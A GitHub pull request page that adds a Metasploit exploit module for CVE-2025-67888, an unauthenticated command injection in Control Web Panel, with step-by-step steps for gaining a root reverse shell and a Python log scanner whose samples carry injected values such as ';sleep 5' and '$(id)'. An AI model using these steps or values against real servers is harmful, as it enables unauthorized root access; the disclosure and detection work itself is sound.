

@JohannesLks JohannesLks commented Dec 24, 2025

Fixes #20788

Add Control Web Panel API Command Injection Exploit (CVE-2025-67888)

This PR adds a new exploit module for CVE-2025-67888, an unauthenticated OS command injection vulnerability in Control Web Panel (CWP) versions <= 0.9.8.1208.

What does this change do?

Adds exploit/linux/http/control_web_panel_api_cmd_exec which exploits a blind command injection via the key GET parameter in /admin/index.php when api=1 is set. Successful exploitation grants root-level access.

Prerequisites: Softaculous and/or SitePad must be installed via CWP Scripts Manager.

Files Added

  • modules/exploits/linux/http/control_web_panel_api_cmd_exec.rb
  • documentation/modules/exploit/linux/http/control_web_panel_api_cmd_exec.md

Verification

  • Start msfconsole
  • use exploit/linux/http/control_web_panel_api_cmd_exec
  • set RHOSTS <target>
  • set RPORT 2031
  • set SSL true
  • set LHOST <attacker>
  • check
  • Verify target is detected as vulnerable (time-based check)
  • set payload cmd/unix/reverse_bash
  • exploit
  • Verify shell session opens with root privileges
  • Document verified via included documentation file

References
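A defender-side check for the request pattern this PR describes (a GET to /admin/index.php with api=1 and a key value carrying shell metacharacters), run over constructed sample access-log lines. This is an added example, not code from the PR or the Metasploit module; it assumes combined log format and that a legitimate API key never contains shell metacharacters.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx combined log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Dec/2025:10:01:02 +0000] "GET /admin/index.php?api=1&key=Ab3dEf9k HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [24/Dec/2025:10:01:09 +0000] "GET /admin/index.php?api=1&key=Ab3d%3Bsleep+5 HTTP/1.1" 200 73 "-" "curl/8.4.0"
203.0.113.12 - - [24/Dec/2025:10:02:15 +0000] "GET /login/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.13 - - [24/Dec/2025:10:03:40 +0000] "GET /admin/index.php?api=1&key=%24%28id%29 HTTP/1.1" 200 73 "-" "python-requests/2.31"
203.0.113.14 - - [24/Dec/2025:10:04:01 +0000] "GET /admin/index.php?key=Ab3d%3Bid HTTP/1.1" 302 0 "-" "curl/8.4.0"
"""

# Combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that a legitimate key should never contain (assumption).
SHELL_META_RE = re.compile(r'[;|&`$(){}<>\\\s]')


def inspect_request(line):
    """Return a finding dict for a suspicious CWP API request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/admin/index.php"):
        return None
    qs = parse_qs(url.query, keep_blank_values=True)
    # The PR states the injection is reached only when api=1 is set,
    # so requests without it are not flagged by this check.
    if qs.get("api") != ["1"] or "key" not in qs:
        return None
    key = qs["key"][0]  # parse_qs has already URL-decoded the value
    if not SHELL_META_RE.search(key):
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "key": key}


def scan_log(text):
    """Return findings for every suspicious line in a log text."""
    return [f for f in (inspect_request(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```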

@JohannesLks JohannesLks marked this pull request as draft December 24, 2025 00:26

bcoles commented Dec 24, 2025

see #20788

Pro-tip: If you write "Fixes #20788", then when this PR is merged that issue will also be closed automatically.

@JohannesLks JohannesLks marked this pull request as ready for review December 24, 2025 11:43
@JohannesLks JohannesLks requested a review from bcoles December 24, 2025 11:43


Successfully merging this pull request may close these issues.

CVE-2025-67888 — Control Web Panel <= 0.9.8.1208 Unauthenticated OS Command Injection Vulnerability
